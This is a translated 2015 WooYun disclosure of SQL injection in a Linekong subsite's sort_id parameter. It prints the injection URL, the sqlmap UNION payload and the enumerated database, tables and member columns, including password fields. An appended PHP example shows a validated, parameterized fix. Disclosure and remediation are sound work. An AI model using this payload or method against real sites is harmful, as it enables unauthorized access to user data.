
Vulnerability summary

Bug ID: wooyun-2015-0118746

Title: SQL injection in another Linekong (蓝港) subsite

Vendor: linekong.com

Author: 路人甲

Submitted: 2015-06-08 12:36

Fixed: 2015-07-24 14:46

Published: 2015-07-24 14:46

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 18

Status: confirmed by vendor

Source: http://www.wooyun.org



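Vulnerability details

Disclosure status:

2015-06-08: Details sent to the vendor; awaiting vendor handling
2015-06-09: Vendor confirmed; details disclosed to the vendor only
2015-06-19: Details disclosed to core white hats and experts in related fields
2015-06-29: Details disclosed to regular white hats
2015-07-09: Details disclosed to intern white hats
2015-07-24: Details disclosed to the public

Brief description:

Requesting a high rank

Detailed description:

Injection point:

http://fr.linekong.com/xml/common.php?sort_id=*


The sort_id parameter is vulnerable to SQL injection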



sqlmap identified the following injection points with a total of 2179 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: UNION query
Title: MySQL UNION query (92) - 4 columns
Payload: http://fr.linekong.com:80/xml/common.php?sort_id=' UNION ALL SELECT 92,CONCAT(0x7178707871,0x61676f74467957576955,0x7170707671),92,92#
Vector: UNION ALL SELECT 92,[QUERY],92,92#
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
available databases [2]:
[*] fr_web
[*] information_schema
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: UNION query
Title: MySQL UNION query (92) - 4 columns
Payload: http://fr.linekong.com:80/xml/common.php?sort_id=' UNION ALL SELECT 92,CONCAT(0x7178707871,0x61676f74467957576955,0x7170707671),92,92#
---
web application technology: Apache
back-end DBMS: MySQL 5
Database: fr_web
[28 tables]
+-------------------------+
| fr_activity_newcard_log |
| fr_address |
| fr_article |
| fr_article_inserl |
| fr_build |
| fr_channel |
| fr_columns |
| fr_comment |
| fr_download |
| fr_editors_inserl |
| fr_flash |
| fr_grading |
| fr_group |
| fr_image |
| fr_image_inserl |
| fr_member |
| fr_passportstat |
| fr_sort |
| fr_template |
| fr_url |
| fr_url_inserl |
| fr_vote |
| fr_vote_inserl |
| fr_vote_option |
| fr_wj_article |
| fr_wj_article_inserl |
| fr_wj_image |
| fr_wj_image_inserl |
+-------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: UNION query
Title: MySQL UNION query (92) - 4 columns
Payload: http://fr.linekong.com:80/xml/common.php?sort_id=' UNION ALL SELECT 92,CONCAT(0x7178707871,0x61676f74467957576955,0x7170707671),92,92#
---
web application technology: Apache
back-end DBMS: MySQL 5
Database: fr_web
Table: fr_member
[26 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| address_id | int(11) |
| article_id | int(11) |
| group_id | int(11) |
| id | int(11) |
| image_id | int(11) |
| nickname | varchar(64) |
| uadd_time | datetime |
| url_id | int(11) |
| user_age | date |
| user_Dreply | int(11) |
| user_Dtopic | int(11) |
| user_email | varchar(32) |
| user_grading | varchar(64) |
| user_jointime | datetime |
| user_like | varchar(255) |
| user_movephone | varchar(32) |
| user_msn | varchar(128) |
| user_name | varchar(32) |
| user_passwd | varchar(32) |
| user_perfect | int(11) |
| user_qq | int(11) |
| user_sex | int(2) |
| user_state | int(2) |
| user_Treply | int(11) |
| user_Ttopic | int(11) |
| vote_id | int(11) |
+----------------+--------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: UNION query
Title: MySQL UNION query (92) - 4 columns
Payload: http://fr.linekong.com:80/xml/common.php?sort_id=' UNION ALL SELECT 92,CONCAT(0x7178707871,0x61676f74467957576955,0x7170707671),92,92#
---
web application technology: Apache
back-end DBMS: MySQL 5
Database: fr_web
Table: fr_member
[8 entries]

Proof of vulnerability:


Fix:

Filter the parameter

Copyright notice: when reposting, please credit the source 路人甲@乌云 (WooYun)
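
One way to implement the "filter the parameter" fix for `sort_id`, shown as an added example that is not code from the reported site or from the reporter: strict integer validation followed by a bound parameter, so the value can never change the query structure. It assumes `sort_id` is a numeric identifier; the column names are hypothetical, and an in-memory SQLite database with constructed rows stands in for the MySQL back end.

```php
<?php
declare(strict_types=1);

// Added example. Only fr_sort and sort_id come from the report; the columns
// (id, name, parent_id, position) and the sample rows are constructed.

/** Allow-list check: accept only a positive decimal integer. */
function parseSortId(string $raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/** Look up one row with the value bound as data, never concatenated into SQL. */
function fetchSort(PDO $db, string $rawSortId): array
{
    $id = parseSortId($rawSortId);
    if ($id === null) {
        return [];   // a real handler would answer HTTP 400 and log the request
    }
    $stmt = $db->prepare(
        'SELECT id, name, parent_id, position FROM fr_sort WHERE id = :id'
    );
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed stand-in database. With pdo_mysql, also set
// PDO::ATTR_EMULATE_PREPARES to false so the server prepares the statement.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE fr_sort (id INTEGER PRIMARY KEY, name TEXT,
                                 parent_id INTEGER, position INTEGER)');
$db->exec("INSERT INTO fr_sort VALUES (1, 'news', 0, 1), (2, 'events', 0, 2)");

// The payload string sqlmap reported for this parameter, used as test input.
$payload = "' UNION ALL SELECT 92,CONCAT(0x7178707871,"
         . "0x61676f74467957576955,0x7170707671),92,92#";

var_dump(fetchSort($db, '2'));        // one row: the "events" entry
var_dump(fetchSort($db, $payload));   // empty array: rejected before any SQL runs
```

The integer check alone would stop this particular payload, but the bound parameter is what keeps the query safe if the validation is later loosened or the parameter becomes a string.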


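Vulnerability response

Vendor response:

Severity: Medium

Vulnerability rank: 10

Confirmed: 2015-06-09 14:45

Vendor reply:

Thank you for reporting this issue. The project has been retired, and we are preparing to take it offline.

Latest status:

None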